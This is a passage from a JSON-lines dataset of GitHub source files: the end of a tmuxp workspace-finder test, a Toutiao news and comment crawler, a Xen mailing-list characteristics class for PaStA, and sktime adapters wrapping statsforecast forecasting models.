user_config\n )\n assert find_workspace_file(\"myconfig\") == str(user_config)\n assert find_workspace_file(\"~/.tmuxp/myconfig.yaml\") == str(user_config)\n\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\".tmuxp.json\")\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\".tmuxp.ini\")\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\"../\")\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\"mooooooo\")\n\n monkeypatch.chdir(homedir)\n\n expect = str(project_config)\n assert find_workspace_file(\"work/project\") == expect\n assert find_workspace_file(\"work/project/\") == expect\n assert find_workspace_file(\"./work/project\") == expect\n assert find_workspace_file(\"./work/project/\") == expect\n assert find_workspace_file(\".tmuxp/%s.yaml\" % user_config_name) == str(user_config)\n assert find_workspace_file(\"./.tmuxp/%s.yaml\" % user_config_name) == str(\n user_config\n )\n assert find_workspace_file(\"myconfig\") == str(user_config)\n assert find_workspace_file(\"~/.tmuxp/myconfig.yaml\") == str(user_config)\n\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\"\")\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\".\")\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\".tmuxp.yaml\")\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\"../\")\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\"mooooooo\")\n\n monkeypatch.chdir(configdir)\n\n expect = str(project_config)\n assert find_workspace_file(\"../work/project\") == expect\n assert find_workspace_file(\"../../home/work/project\") == expect\n assert find_workspace_file(\"../work/project/\") == expect\n assert find_workspace_file(\"%s.yaml\" % user_config_name) == str(user_config)\n assert find_workspace_file(\"./%s.yaml\" % user_config_name) == str(user_config)\n assert find_workspace_file(\"myconfig\") == str(user_config)\n assert find_workspace_file(\"~/.tmuxp/myconfig.yaml\") == str(user_config)\n\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\"\")\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\".\")\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\".tmuxp.yaml\")\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\"../\")\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\"mooooooo\")\n\n monkeypatch.chdir(tmp_path)\n\n expect = str(project_config)\n assert find_workspace_file(\"home/work/project\") == expect\n assert find_workspace_file(\"./home/work/project/\") == expect\n assert find_workspace_file(\"home/.tmuxp/%s.yaml\" % user_config_name) == str(\n user_config\n )\n assert find_workspace_file(\"./home/.tmuxp/%s.yaml\" % user_config_name) == str(\n user_config\n )\n assert find_workspace_file(\"myconfig\") == str(user_config)\n assert find_workspace_file(\"~/.tmuxp/myconfig.yaml\") == str(user_config)\n\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\"\")\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\".\")\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\".tmuxp.yaml\")\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\"../\")\n with pytest.raises(FileNotFoundError):\n find_workspace_file(\"mooooooo\")\n\n\ndef test_find_workspace_file_arg(\n homedir: pathlib.Path,\n configdir: pathlib.Path,\n projectdir: pathlib.Path,\n monkeypatch: pytest.MonkeyPatch,\n capsys: pytest.CaptureFixture[str],\n) -> None:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"workspace_file\", type=str)\n\n def config_cmd(workspace_file: str) -> None:\n tmuxp_echo(find_workspace_file(workspace_file, workspace_dir=configdir))\n\n monkeypatch.setenv(\"HOME\", str(homedir))\n tmuxp_config_path = projectdir / \".tmuxp.yaml\"\n tmuxp_config_path.touch()\n user_config_name = \"myconfig\"\n user_config = configdir / f\"{user_config_name}.yaml\"\n user_config.touch()\n\n project_config = projectdir / \".tmuxp.yaml\"\n\n def check_cmd(config_arg: str) -> \"_pytest.capture.CaptureResult[str]\":\n args = parser.parse_args([config_arg])\n config_cmd(workspace_file=args.workspace_file)\n return capsys.readouterr()\n\n monkeypatch.chdir(projectdir)\n expect = str(project_config)\n assert expect in check_cmd(\".\").out\n assert expect in check_cmd(\"./\").out\n assert expect in check_cmd(\"\").out\n assert expect in check_cmd(\"../project\").out\n assert expect in check_cmd(\"../project/\").out\n assert expect in check_cmd(\".tmuxp.yaml\").out\n assert str(user_config) in check_cmd(\"../../.tmuxp/%s.yaml\" % user_config_name).out\n assert user_config.stem in check_cmd(\"myconfig\").out\n assert str(user_config) in check_cmd(\"~/.tmuxp/myconfig.yaml\").out\n\n with pytest.raises(FileNotFoundError, match=\"file not found\"):\n assert \"file not found\" in check_cmd(\".tmuxp.json\").err\n with pytest.raises(FileNotFoundError, match=\"file not found\"):\n assert \"file not found\" in check_cmd(\".tmuxp.ini\").err\n with pytest.raises(FileNotFoundError, match=\"No tmuxp files found\"):\n assert \"No tmuxp files found\" in check_cmd(\"../\").err\n with pytest.raises(\n FileNotFoundError, match=\"workspace-file not found in workspace dir\"\n ):\n assert \"workspace-file not found in workspace dir\" in check_cmd(\"moo\").err\n","repo_name":"tmux-python/tmuxp","sub_path":"tests/workspace/test_finder.py","file_name":"test_finder.py","file_ext":"py","file_size_in_byte":9390,"program_lang":"python","lang":"en","doc_type":"code","stars":3824,"dataset":"github-code","pt":"52"} +{"seq_id":"22115874034","text":"\"\"\"\n爬取今日头条的新闻及评论,实现基本的轮子\n\n暂不支持今日头条站外新闻\n\n实现的函数\n1. get_news_addr(keyword=\"砍人者反被砍\",limit=100)\n2. get_news_content(addr)\n3. get_comments(addr,limit=1000)\n\"\"\"\n\nimport re\nimport json\nimport time\nfrom bs4 import BeautifulSoup\n\ntry:\n from .lib import simple_download, download_use_chromedriver\nexcept:\n from lib import simple_download, download_use_chromedriver\n\n\nINF = 1e9\n\ndef get_news_addr(keyword=\"砍人者反被砍\", limit=100, min_comment_count=0, count_once=5):\n \"\"\"\n 功能\n - 根据关键词获取头条中的新闻地址,默认获取超过100篇新闻地址后停止。\n\n 输出\n - [(title,group_id,item_id,comment_count,datetime,tag),...]\n\n 需要注意的是,会出现以下问题:\n - 会找到一些不相关的新闻。这个问题通过精确检索等方法进行改善。\n - 会找到一些内容重复的新闻。这个问题有两个考虑角度:\n (1) 如仅参考评论意见,则没有必要考虑二者差异,\n (2) 使用一些文本处理方法去重,合并评论。\n - 会返回站外新闻。\n \"\"\"\n url = 'https://www.toutiao.com/search_content/'\n count = min(count_once,limit) # 一次获取多少新闻\n args = {\n 'keyword': keyword,\n 'offset': 0, # 从第0条新闻开始\n 'count': count, # 一次爬去20条新闻\n 'format': 'json',\n 'from': 'search_tab',\n 'cur_tab': 1,\n 'autoload': 'true'\n }\n has_more = 1 # 还有更多新闻\n news_addr = []\n comment_num = 0\n\n while has_more == 1 and len(news_addr) < limit:\n wbdata = simple_download(url, args)\n data = json.loads(wbdata)\n has_more = data['has_more']\n many_news = data['data']\n\n for news in many_news:\n if 'cell_type' in news:\n continue\n has_gallery = news['has_gallery']\n if has_gallery:\n continue\n \n comment_count = int(news['comment_count']) # 通过局部观察,group_id 和 item_id 是一样的\n if comment_count <= min_comment_count:\n continue\n comment_num += comment_count\n tuple_ = (news['title'], news['group_id'], \n news['item_id'],comment_count,\n news['datetime'],news['tag'])\n news_addr.append(tuple_)\n \n args['offset'] += count\n\n return news_addr,comment_num\n\n\ndef _write_addr(dir_, addrs):\n \"\"\"将地址列表内写入到指定路径中\"\"\"\n with open(dir_, 'w', encoding='utf-8') as file_out:\n file_out.writelines([str(addr) + '\\n' for addr in addrs])\n\n\ndef get_time_from_str(str_):\n \"\"\"\n s 例如 原创 水木然 2018-08-30 23:11:30\n \"\"\"\n str_time = re.search(r'\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2}',str_)\n if not str_time:\n return -1\n str_time = str_time.group()\n struct_time = time.strptime(str_time,'%Y-%m-%d %H:%M:%S')\n return int(time.mktime(struct_time))\n\n\ndef get_news_content(addr):\n \"\"\"\n 根据地址爬取新闻正文\n 输出字段:source_url,title,document,publication_at,tags,category\n \"\"\"\n _,group_id,_,comment_count,datetime,category = addr\n source_url = 'https://www.toutiao.com/group/' + group_id\n driver = download_use_chromedriver(source_url)\n if driver == -1:\n return -1\n html = driver.page_source\n current_url = driver.current_url\n driver.quit()\n\n # print (current_url)\n if 'https://www.toutiao.com' not in current_url: # 链接位于头条站外\n return -1\n\n soup = BeautifulSoup(html, 'html.parser')\n title = soup.find('h1', class_='article-title').text\n\n document = soup.find('div', class_='article-content').text\n\n # publication_at = soup.find('div', class_='article-sub').text\n publication_at = get_time_from_str(datetime)\n\n return source_url, title, document, publication_at, category\n\n\ndef get_comments(addr, limit=1000, count_once=20):\n \"\"\"\n 功能:爬取文章下面的评论,暂不考虑评论下的回复\n 输出举例:[('支持。骑车哥无罪释放。大家都顶起来。', 283, 1535646388),...]\n \"\"\"\n limit = int(limit)\n if limit == -1:\n limit = INF\n\n count = min(count_once,limit)\n _, group_id, item_id = addr[:3]\n url = 'https://ic.snssdk.com/article/v3/tab_comments/'\n args = {\n 'group_id': group_id,\n 'item_id': item_id,\n 'offset': 0, # 从第0条新闻开始\n 'count': count, # 一次爬去20条新闻\n 'device_platform':'android'\n }\n\n has_more = True # 还有更多新闻\n comments = []\n\n while has_more == True and len(comments) < limit:\n\n wbdata = simple_download(url, args)\n\n wbdata = json.loads(wbdata)\n has_more = wbdata['has_more']\n data = wbdata['data']\n\n for comment in data:\n comment = comment['comment']\n content = comment['text']\n upvote = comment['digg_count']\n id_ = comment['id']\n publication_at = comment['create_time']\n comments.append((content, upvote, publication_at,id_))\n # print(comment['reply_count'])\n replys = get_reply(id_)\n comments.extend(replys)\n \n args['offset'] += count\n \n return comments\n\n\ndef get_reply(comment_id,count_once=10):\n\n url = 'https://www.toutiao.com/api/comment/get_reply/'\n args = {\n 'comment_id': comment_id,\n 'offset': 0, \n 'count': count_once\n }\n\n has_more = True # 还有更多新闻\n replys = []\n\n while has_more == True:\n\n wbdata = simple_download(url, args)\n\n wbdata = json.loads(wbdata)\n # print (wbdata)\n data = wbdata['data']\n has_more = data['has_more']\n\n for reply in data['data']:\n content = reply['text']\n upvote = reply['digg_count']\n publication_at = reply['create_time']\n replys.append((content, upvote, publication_at, -1))\n # print (replys[-1])\n args['offset'] += count_once\n \n return replys\n\n\nif __name__ == '__main__':\n addr2 = ('知情人眼中的昆山“反杀砍人者”于海明:三个孩子的父亲 “人很和善”', '6595411268977295886', '6595411268977295886', 68965, '2018-08-30 15:24:10', 'news_society')\n\n ## 功能1:根据关键词,爬取新闻地址 6595411268977295886\n # addrs,comment_num = get_news_addr(keyword=\"砍人者被反杀\",limit=100, min_comment_count=10,count_once=5)\n\n ## 功能2:根据地址,获取文章正文\n # r = get_news_content(addr2)\n # print (r)\n\n # 功能3:根据地址,获取评论\n r = get_comments(addr2,count_once=40,limit=100)\n print(len(r))\n id_ =r[-5][-1]\n print (id_)\n replys = get_reply(id_)\n print (replys)\n \n","repo_name":"zhangsiqi951016/sentiment_analysis_demo","sub_path":"web/crawler/crawler/toutiao.py","file_name":"toutiao.py","file_ext":"py","file_size_in_byte":6907,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"16861569665","text":"from .MailCharacteristics import MailCharacteristics, PatchType\n\n\nclass XenMailCharacteristics(MailCharacteristics):\n ROOT_DIRS = ['config/',\n 'docs/',\n 'stubdom/',\n 'tools/',\n 'xen/',\n 'automation/',\n 'm4/',\n 'misc/',\n 'scripts/',\n ]\n ROOT_FILES = ['.cirrus.yml',\n '.gitarchive-info',\n '.gitattributes',\n '.gitignore',\n '.gitlab-ci.yml',\n '.hgignore',\n '.hgsigs',\n '.hgtags',\n 'CHANGELOG.md',\n 'CODING_STYLE',\n 'CONTRIBUTING',\n 'COPYING',\n 'CREDITS',\n 'Config.mk',\n 'INSTALL',\n 'MAINTAINERS',\n 'Makefile',\n 'README',\n 'SUPPORT.md',\n 'autogen.sh',\n 'config.guess',\n 'config.sub',\n 'configure',\n 'configure.ac',\n 'install.sh',\n 'version.sh',\n ]\n\n HAS_MAINTAINERS = True\n\n # Additional lists that are not known by pasta\n LISTS = {'osstest-admin@xenproject.org',\n 'security@xen.org',\n 'xen-api@lists.xenproject.org',\n 'xen-devel@lists.xen.org',\n 'xen-devel@lists.xensource.com',\n 'xen-users@lists.xenproject.org',\n }\n\n def __init__(self, repo, maintainers_version, clustering, message_id):\n super().__init__(repo, clustering, message_id)\n self.__init()\n self._cleanup(maintainers_version)\n\n def __init(self):\n pass\n","repo_name":"lfd/PaStA","sub_path":"pypasta/XenMailCharacteristics.py","file_name":"XenMailCharacteristics.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"52"} +{"seq_id":"33997921280","text":"__author__ = [\"FedericoGarza\", \"yarnabrina\"]\n\n__all__ = [\n \"StatsForecastAutoARIMA\",\n \"StatsForecastAutoCES\",\n \"StatsForecastAutoETS\",\n \"StatsForecastAutoTheta\",\n \"StatsForecastMSTL\",\n]\nfrom typing import Dict, List, Optional, Union\n\nfrom sktime.forecasting.base import BaseForecaster\nfrom sktime.forecasting.base.adapters._generalised_statsforecast import (\n StatsForecastBackAdapter,\n _GeneralisedStatsForecastAdapter,\n)\nfrom sktime.utils.validation._dependencies import _check_soft_dependencies\n\n\nclass StatsForecastAutoARIMA(_GeneralisedStatsForecastAdapter):\n \"\"\"StatsForecast AutoARIMA estimator.\n\n This implementation is inspired by Hyndman's forecast::auto.arima [1]_\n and based on the Python implementation of statsforecast [2]_ by Nixtla.\n\n Returns best ARIMA model according to either AIC, AICc or BIC value.\n The function conducts a search over possible model within\n the order constraints provided.\n\n Parameters\n ----------\n start_p: int (default 2)\n Starting value of p in stepwise procedure.\n d: int optional (default None)\n Order of first-differencing.\n If missing, will choose a value based on `test`.\n start_q: int (default 2)\n Starting value of q in stepwise procedure.\n max_p: int (default 5)\n Maximum value of p.\n max_d: int (default 2)\n Maximum number of non-seasonal differences\n max_q: int (default 5)\n Maximum value of q.\n start_P: int (default 1)\n Starting value of P in stepwise procedure.\n D: int optional (default None)\n Order of seasonal-differencing.\n If missing, will choose a value based on `season_test`.\n start_Q: int (default 1)\n Starting value of Q in stepwise procedure.\n max_P: int (default 2)\n Maximum value of P.\n max_D: int (default 1)\n Maximum number of seasonal differences\n max_Q: int (default 2)\n Maximum value of Q.\n max_order: int (default 5)\n Maximum value of p+q+P+Q if model selection is not stepwise.\n sp: int (default 1)\n Number of observations per unit of time.\n For example 24 for Hourly data.\n seasonal: bool (default True)\n If False, restricts search to non-seasonal models.\n stationary: bool (default False)\n If True, restricts search to stationary models.\n information_criterion: str (default 'aicc')\n Information criterion to be used in model selection.\n It can be chosen from among the following strings:\n - 'aicc' for Akaike's information criterion corrected.\n - 'aic' for Akaike's information criterion.\n - 'bic' for bayesian information criterion.\n test: str (default 'kpss')\n Type of unit root test to use. See ndiffs for details.\n Only 'kpss' for the Kwiatkowski-Phillip-Schmidt-Shin test\n is allowed.\n seasonal_test: str (default 'seas')\n This determines which method is used to select the number\n of seasonal differences.\n The default method ('seas') is to use a measure of seasonal\n strength computed from an STL decomposition.\n Other possibilities involve seasonal unit root tests.\n Only 'seas' is allowed.\n stepwise: bool (default True)\n If True, will do stepwise selection (faster).\n Otherwise, it searches over all models.\n Non-stepwise selection can be very slow,\n especially for seasonal models.\n n_jobs: int (default 2)\n Allows the user to specify the amount of parallel processes to be used\n if parallel = True and stepwise = False.\n If None, then the number of logical cores is\n automatically detected and all available cores are used.\n trend: bool (default True)\n If True, models with drift terms are considered.\n method: str optional (default None)\n fitting method: maximum likelihood or minimize conditional\n sum-of-squares.\n The default (unless there are missing values)\n is to use conditional-sum-of-squares to find starting values,\n then maximum likelihood. Can be abbreviated.\n It can be chosen from among the following strings:\n - 'CSS-ML' for conditional sum-of-squares to find starting values and\n then maximum likelihood.\n - 'ML' for maximum likelihood.\n - 'CSS' for conditional sum-of-squares.\n offset_test_args: dict optional (default None)\n Additional arguments to be passed to the unit root test.\n seasonal_test_args: dict optional (default None)\n Additional arguments to be passed to the seasonal\n unit root test. See nsdiffs for details.\n trace: bool (default False)\n If True, the list of ARIMA models considered will be reported.\n n_fits: int (default 94)\n Maximum number of models considered in the stepwise search.\n with_intercept: bool (default True)\n If True, models with a non-zero mean are considered.\n approximation: bool optional (default None)\n If True, estimation is via conditional sums of squares\n and the information criteria used for model\n selection are approximated.\n The final model is still computed using\n maximum likelihood estimation.\n Approximation should be used for long time series\n or a high seasonal period to avoid excessive computation times.\n truncate: bool optional (default None)\n An integer value indicating how many observations\n to use in model selection.\n The last truncate values of the series are\n used to select a model when truncate is not None\n and approximation=True.\n All observations are used if either truncate=None\n or approximation=False.\n blambda: float optional (default None)\n Box-Cox transformation parameter.\n If lambda=\"auto\", then a transformation is automatically\n selected using BoxCox.lambda.\n The transformation is ignored if None.\n Otherwise, data transformed before model is estimated.\n biasadj: bool (default False)\n Use adjusted back-transformed mean for Box-Cox transformations.\n If transformed data is used to produce forecasts and fitted values,\n a regular back transformation will result in median forecasts.\n If biasadj is True, an adjustment will be made to produce\n mean forecasts and fitted values.\n parallel: bool (default False)\n If True and stepwise = False, then the specification search\n is done in parallel.\n This can give a significant speedup on multicore machines.\n\n References\n ----------\n .. [1] https://github.com/robjhyndman/forecast\n .. [2] https://github.com/Nixtla/statsforecast\n\n Examples\n --------\n >>> from sktime.datasets import load_airline\n >>> from sktime.forecasting.statsforecast import StatsForecastAutoARIMA\n >>> y = load_airline()\n >>> forecaster = StatsForecastAutoARIMA( # doctest: +SKIP\n ... sp=12, d=0, max_p=2, max_q=2\n ... )\n >>> forecaster.fit(y) # doctest: +SKIP\n StatsForecastAutoARIMA(...)\n >>> y_pred = forecaster.predict(fh=[1,2,3]) # doctest: +SKIP\n \"\"\"\n\n _tags = {\n \"ignores-exogeneous-X\": False,\n \"capability:pred_int\": True,\n \"capability:pred_int:insample\": True,\n }\n\n def __init__(\n self,\n start_p: int = 2,\n d: Optional[int] = None,\n start_q: int = 2,\n max_p: int = 5,\n max_d: int = 2,\n max_q: int = 5,\n start_P: int = 1,\n D: Optional[int] = None,\n start_Q: int = 1,\n max_P: int = 2,\n max_D: int = 1,\n max_Q: int = 2,\n max_order: int = 5,\n sp: int = 1,\n seasonal: bool = True,\n stationary: bool = False,\n information_criterion: str = \"aicc\",\n test: str = \"kpss\",\n seasonal_test: str = \"seas\",\n stepwise: bool = True,\n n_jobs: int = 2,\n trend: bool = True,\n method: Optional[str] = None,\n offset_test_args: Optional[str] = None,\n seasonal_test_args: Optional[Dict] = None,\n trace: bool = False,\n n_fits: int = 94,\n with_intercept: bool = True,\n approximation: Optional[bool] = None,\n truncate: Optional[bool] = None,\n blambda: Optional[float] = None,\n biasadj: bool = False,\n parallel: bool = False,\n ):\n self.start_p = start_p\n self.d = d\n self.start_q = start_q\n self.max_p = max_p\n self.max_d = max_d\n self.max_q = max_q\n self.start_P = start_P\n self.D = D\n self.start_Q = start_Q\n self.max_P = max_P\n self.max_D = max_D\n self.max_Q = max_Q\n self.max_order = max_order\n self.sp = sp\n self.seasonal = seasonal\n self.stationary = stationary\n self.information_criterion = information_criterion\n self.test = test\n self.seasonal_test = seasonal_test\n self.stepwise = stepwise\n self.n_jobs = n_jobs\n self.trend = trend\n self.method = method\n self.offset_test_args = offset_test_args\n self.seasonal_test_args = seasonal_test_args\n self.trace = trace\n self.n_fits = n_fits\n self.with_intercept = with_intercept\n self.approximation = approximation\n self.truncate = truncate\n self.blambda = blambda\n self.biasadj = biasadj\n self.parallel = parallel\n\n super().__init__()\n\n def _get_statsforecast_class(self):\n \"\"\"Get the class of the statsforecast forecaster.\"\"\"\n from statsforecast.models import AutoARIMA\n\n return AutoARIMA\n\n def _get_statsforecast_params(self):\n return {\n \"d\": self.d,\n \"D\": self.D,\n \"max_p\": self.max_p,\n \"max_q\": self.max_q,\n \"max_P\": self.max_P,\n \"max_Q\": self.max_Q,\n \"max_order\": self.max_order,\n \"max_d\": self.max_d,\n \"max_D\": self.max_D,\n \"start_p\": self.start_p,\n \"start_q\": self.start_q,\n \"start_P\": self.start_P,\n \"start_Q\": self.start_Q,\n \"stationary\": self.stationary,\n \"seasonal\": self.seasonal,\n \"ic\": self.information_criterion,\n \"stepwise\": self.stepwise,\n \"nmodels\": self.n_fits,\n \"trace\": self.trace,\n \"approximation\": self.approximation,\n \"method\": self.method,\n \"truncate\": self.truncate,\n \"test\": self.test,\n \"test_kwargs\": self.offset_test_args,\n \"seasonal_test\": self.seasonal_test,\n \"seasonal_test_kwargs\": self.seasonal_test_args,\n \"allowdrift\": self.trend,\n \"allowmean\": self.with_intercept,\n \"blambda\": self.blambda,\n \"biasadj\": self.biasadj,\n \"parallel\": self.parallel,\n \"num_cores\": self.n_jobs,\n \"season_length\": self.sp,\n }\n\n @classmethod\n def get_test_params(cls, parameter_set=\"default\"):\n \"\"\"Return testing parameter settings for the estimator.\n\n Parameters\n ----------\n parameter_set : str, default=\"default\"\n Name of the set of test parameters to return, for use in tests. If no\n special parameters are defined for a value, will return `\"default\"` set.\n\n\n Returns\n -------\n params : dict or list of dict, default = {}\n Parameters to create testing instances of the class\n Each dict are parameters to construct an \"interesting\" test instance, i.e.,\n `MyClass(**params)` or `MyClass(**params[i])` creates a valid test instance.\n `create_test_instance` uses the first (or only) dictionary in `params`\n \"\"\"\n del parameter_set # to avoid being detected as unused by ``vulture`` etc.\n\n params = [{}, {\"approximation\": True, \"max_p\": 4, \"max_Q\": 1}]\n\n return params\n\n\nclass StatsForecastAutoTheta(_GeneralisedStatsForecastAdapter):\n \"\"\"StatsForecast AutoTheta estimator.\n\n This implementation is a wrapper over Nixtla implementation in statsforecast [1]_.\n\n AutoTheta model automatically selects the best Theta (Standard Theta Model (\"STM\"),\n Optimized Theta Model (\"OTM\"), Dynamic Standard Theta Model (\"DSTM\"), Dynamic\n Optimized Theta Model (\"DOTM\")) model using mse.\n\n Parameters\n ----------\n season_length : int, optional\n number of observations per unit of time (e.g. 24 for hourly data), by default 1\n decomposition_type : str, optional\n type of seasonal decomposition, by default \"multiplicative\"\n\n possible values: \"additive\", \"multiplicative\"\n model : Optional[str], optional\n controlling Theta Model, by default searches the best model\n\n References\n ----------\n .. [1] https://nixtla.github.io/statsforecast/models.html#autotheta\n\n See Also\n --------\n ThetaForecaster\n \"\"\"\n\n _tags = {\n \"ignores-exogeneous-X\": True,\n \"capability:pred_int\": True,\n \"capability:pred_int:insample\": True,\n }\n\n def __init__(\n self,\n season_length: int = 1,\n decomposition_type: str = \"multiplicative\",\n model: Optional[str] = None,\n ):\n self.season_length = season_length\n self.decomposition_type = decomposition_type\n self.model = model\n\n super().__init__()\n\n def _get_statsforecast_class(self):\n \"\"\"Get the class of the statsforecast forecaster.\"\"\"\n from statsforecast.models import AutoTheta\n\n return AutoTheta\n\n def _get_statsforecast_params(self):\n return {\n \"season_length\": self.season_length,\n \"decomposition_type\": self.decomposition_type,\n \"model\": self.model,\n }\n\n @classmethod\n def get_test_params(cls, parameter_set=\"default\"):\n \"\"\"Return testing parameter settings for the estimator.\n\n Parameters\n ----------\n parameter_set : str, default=\"default\"\n Name of the set of test parameters to return, for use in tests. If no\n special parameters are defined for a value, will return `\"default\"` set.\n There are currently no reserved values for forecasters.\n\n Returns\n -------\n params : dict or list of dict, default = {}\n Parameters to create testing instances of the class\n Each dict are parameters to construct an \"interesting\" test instance, i.e.,\n `MyClass(**params)` or `MyClass(**params[i])` creates a valid test instance.\n `create_test_instance` uses the first (or only) dictionary in `params`\n \"\"\"\n del parameter_set # to avoid being detected as unused by ``vulture`` etc.\n\n params = [{}, {\"season_length\": 4}]\n\n return params\n\n\nclass StatsForecastAutoETS(_GeneralisedStatsForecastAdapter):\n \"\"\"StatsForecast Automatic Exponential Smoothing model.\n\n This implementation is a wrapper over Nixtla implementation in statsforecast [1]_.\n\n Automatically selects the best ETS (Error, Trend, Seasonality) model using an\n information criterion. Default is Akaike Information Criterion (AICc), while\n particular models are estimated using maximum likelihood. The state-space\n equations can be determined based on their $M$ multiplicative, $A$ additive, $Z$\n optimized or $N$ omitted components. The `model` string parameter defines the ETS\n equations: E in [$M, A, Z$], T in [$N, A, M, Z$], and S in [$N, A, M, Z$].\n\n For example when model='ANN' (additive error, no trend, and no seasonality), ETS\n will explore only a simple exponential smoothing.\n\n If the component is selected as 'Z', it operates as a placeholder to ask the\n AutoETS model to figure out the best parameter.\n\n Parameters\n ----------\n season_length : int\n Number of observations per unit of time. Ex: 24 Hourly data.\n model : str\n Controlling state-space-equations.\n damped : bool\n A parameter that 'dampens' the trend.\n\n Notes\n -----\n This implementation is a mirror of Hyndman's forecast::ets [2]_.\n\n References\n ----------\n .. [1] https://nixtla.github.io/statsforecast/models.html#autoets\n .. [2] https://github.com/robjhyndman/forecast\n\n See Also\n --------\n AutoETS\n \"\"\"\n\n _tags = {\n \"ignores-exogeneous-X\": True,\n \"capability:pred_int\": True,\n \"capability:pred_int:insample\": True,\n }\n\n def __init__(\n self, season_length: int = 1, model: str = \"ZZZ\", damped: Optional[bool] = None\n ):\n self.season_length = season_length\n self.model = model\n self.damped = damped\n\n super().__init__()\n\n def _get_statsforecast_class(self):\n \"\"\"Create underlying forecaster instance.\"\"\"\n from statsforecast.models import AutoETS\n\n return AutoETS\n\n def _get_statsforecast_params(self):\n return {\n \"season_length\": self.season_length,\n \"model\": self.model,\n \"damped\": self.damped,\n }\n\n @classmethod\n def get_test_params(cls, parameter_set=\"default\"):\n \"\"\"Return testing parameter settings for the estimator.\n\n Parameters\n ----------\n parameter_set : str, default=\"default\"\n Name of the set of test parameters to return, for use in tests. If no\n special parameters are defined for a value, will return `\"default\"` set.\n There are currently no reserved values for forecasters.\n\n Returns\n -------\n params : dict or list of dict, default = {}\n Parameters to create testing instances of the class\n Each dict are parameters to construct an \"interesting\" test instance, i.e.,\n `MyClass(**params)` or `MyClass(**params[i])` creates a valid test instance.\n `create_test_instance` uses the first (or only) dictionary in `params`\n \"\"\"\n del parameter_set # to avoid being detected as unused by ``vulture`` etc.\n\n params = [{}, {\"season_length\": 4, \"model\": \"ZMZ\"}]\n\n return params\n\n\nclass StatsForecastAutoCES(_GeneralisedStatsForecastAdapter):\n \"\"\"StatsForecast Complex Exponential Smoothing model.\n\n This implementation is a wrapper over Nixtla implementation in statsforecast [1]_.\n\n Automatically selects the best Complex Exponential Smoothing model using an\n information criterion. Default is Akaike Information Criterion (AICc), while\n particular models are estimated using maximum likelihood. The state-space equations\n can be determined based on their $S$ simple, $P$ partial, $Z$ optimized or $N$\n omitted components. The `model` string parameter defines the kind of CES model:\n $N$ for simple CES (without seasonality), $S$ for simple seasonality (lagged CES),\n $P$ for partial seasonality (without complex part), $F$ for full seasonality\n (lagged CES with real and complex seasonal parts).\n\n If the component is selected as 'Z', it operates as a placeholder to ask the\n AutoCES model to figure out the best parameter.\n\n Parameters\n ----------\n season_length : int\n Number of observations per unit of time. Ex: 24 Hourly data.\n model : str\n Controlling state-space-equations.\n\n References\n ----------\n .. [1] https://nixtla.github.io/statsforecast/models.html#autoces\n \"\"\"\n\n _tags = {\n \"ignores-exogeneous-X\": True,\n \"capability:pred_int\": True,\n \"capability:pred_int:insample\": True,\n }\n\n def __init__(self, season_length: int = 1, model: str = \"Z\"):\n self.season_length = season_length\n self.model = model\n\n super().__init__()\n\n def _get_statsforecast_class(self):\n \"\"\"Get the class of the statsforecast forecaster.\"\"\"\n from statsforecast.models import AutoCES\n\n return AutoCES\n\n def _get_statsforecast_params(self):\n return {\n \"season_length\": self.season_length,\n \"model\": self.model,\n }\n\n @classmethod\n def get_test_params(cls, parameter_set=\"default\"):\n \"\"\"Return testing parameter settings for the estimator.\n\n Parameters\n ----------\n parameter_set : str, default=\"default\"\n Name of the set of test parameters to return, for use in tests. If no\n special parameters are defined for a value, will return `\"default\"` set.\n There are currently no reserved values for forecasters.\n\n Returns\n -------\n params : dict or list of dict, default = {}\n Parameters to create testing instances of the class\n Each dict are parameters to construct an \"interesting\" test instance, i.e.,\n `MyClass(**params)` or `MyClass(**params[i])` creates a valid test instance.\n `create_test_instance` uses the first (or only) dictionary in `params`\n \"\"\"\n del parameter_set # to avoid being detected as unused by ``vulture`` etc.\n\n params = [{}, {\"season_length\": 4, \"model\": \"Z\"}]\n\n return params\n\n\nclass StatsForecastMSTL(_GeneralisedStatsForecastAdapter):\n \"\"\"StatsForecast Multiple Seasonal-Trend decomposition using LOESS model.\n\n This implementation is a wrapper over Nixtla implementation in\n statsforecast [1]_.\n\n The MSTL (Multiple Seasonal-Trend decomposition using LOESS) decomposes the time\n series in multiple seasonalities using LOESS. Then forecasts the trend using\n a custom non-seasonal model (`trend_forecaster`) and each seasonality using a\n SeasonalNaive model. MSTL requires the input time series data to be univariate.\n\n Parameters\n ----------\n season_length : Union[int, List[int]]\n Number of observations per unit of time. For multiple seasonalities use a\n list.\n trend_forecaster : estimator, optional, default=StatsForecastAutoETS()\n Sktime estimator used to make univariate forecasts. Multivariate estimators are\n not supported.\n stl_kwargs : dict, optional\n Extra arguments to pass to [`statsmodels.tsa.seasonal.STL`]\n (https://www.statsmodels.org/dev/generated/statsmodels.tsa.seasonal.STL.html#statsmodels.tsa.seasonal.STL).\n The `period` and `seasonal` arguments are reserved.\n pred_int_kwargs : dict, optional\n Extra arguments to pass to [`statsforecast.utils.ConformalIntervals`].\n\n References\n ----------\n .. [1]\n https://nixtla.github.io/statsforecast/src/core/models.html#mstl\n\n Examples\n --------\n >>> from sktime.datasets import load_airline\n >>> from sktime.forecasting.statsforecast import StatsForecastMSTL\n\n >>> y = load_airline()\n >>> model = 